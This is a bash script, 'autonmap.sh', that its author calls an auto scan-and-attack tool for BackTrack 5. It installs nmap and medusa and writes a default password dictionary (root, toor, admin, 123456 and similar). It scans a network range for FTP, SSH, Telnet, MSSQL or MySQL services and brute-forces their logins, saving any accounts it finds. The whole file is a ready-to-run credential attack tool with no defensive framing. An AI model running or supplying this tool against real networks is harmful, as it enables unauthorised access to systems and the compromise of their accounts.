#!/bin/bash
#autonmap.sh :
#Author: Qingzheng
#platform: backtrack5 r3
function Usage(){
echo "########################################"
echo "#Auto scan and attack #"
echo "#autonmap.sh #"
echo "#Author: Qingzheng #"
echo "########################################"
echo -e "${red}Example:"
echo -e "Rhost:>> 192.168.0.0/24"
echo -e "Rport:>> 21 (21/22/23/1433/3306)$white"
echo
}
function DictCreate(){
if [ ! -d $(pwd)/tmp ]; then
mkdir $(pwd)/tmp
if [ ! -e $(pwd)/tmp/user.dict ]; then echo -en "root\n" >$(pwd)/tmp/user.dict; fi
if [ ! -e $(pwd)/tmp/passwd.dict ]; then
echo -en "admin\nadministrator\nadministrators\nroot\nmysql\nadmin123\nadmini123\ntoor\ntoor123\nmysql\nmysql123\n123456\n12345678\n" >$(pwd)/tmp/passwd.dict
fi
fi
}
function Checknmapmedusa(){
if [ ! -e /usr/local/bin/nmap ]; then echo -e "[$blue>$white] Start install nmap";apt-get install -y nmap | sed 's/^/[nmap]/g'; fi
if [ ! -e /usr/local/bin/medusa ]; then echo -e "[$blue>$white] Start install medusa";apt-get install -y medusa | sed 's/^/[medusa]/g'; fi
}
function ScanAttack(){
echo -e "[$blue>$white] Starting scan..."
xterm -geometry 80x20+80+0 -e "nmap -v -sS -sV -oG $(pwd)/tmp/scan-$Rport -p $Rport $Rhost"
grep "$Rport/open/tcp//$Rserver//" $(pwd)/tmp/scan-$Rport | cut -d' ' -f2 >$(pwd)/tmp/scan-analyze-$Rport && rm -rf $(pwd)/tmp/scan-$Rport
sed "s/^/ > /g" $(pwd)/tmp/scan-analyze-$Rport
if [ -s $(pwd)/tmp/scan-analyze-$Rport ]; then
echo -e "[$blue>$white] Straring try crack..."
xterm -geometry 80x20+80+640 -e medusa -U $(pwd)/tmp/user.dict -P $(pwd)/tmp/passwd.dict -e ns -v 10 -H $(pwd)/tmp/scan-analyze-$Rport -M $Rserver -O $(pwd)/tmp/output-$Rport
if [ -s $(pwd)/tmp/output-$Rport ]; then
grep "ACCOUNT FOUND: " $(pwd)/tmp/output-$Rport | awk '{print $3,$4,$5,$6,$7,$8,$9}' | sed "s/$Rserver/>/g" | uniq | tee -a $(pwd)/tmp/output-$Rport.lst && rm -rf $(pwd)/tmp/output-$Rport
echo -e "[$blue>$white] Medusa DONE!!"
else
echo -e "[$blue-$white] Not founding passwd!!"
fi
else
echo -e "[$blue>$white] Not founding hosts"
fi
}
#####################################################################
#####################################################################
function Main(){
blue="\e[01;34m"
red="\e[01;31m"
white="\e[00m"
underline="\\033[4m"
Usage
DictCreate
Checknmapmedusa
while [ True ];do
echo -en "${underline}Rhost$white:$blue>>$white"
read Rhost
echo -en "${underline}Rport$white:$blue>>$white"
read Rport
case $Rport in
"21")
Rserver=ftp
ScanAttack
;;
"22")
Rserver=ssh
ScanAttack
;;
"23")
Rserver=telnet
ScanAttack
;;
"1433")
Rserver=mssql
ScanAttack
;;
"3306")
Rserver=mysql
ScanAttack
;;
*)
echo -e "[$blue>$white] Input error! Quit!!"
break
;;
esac
done
}
#########################################################
#########################################################
Main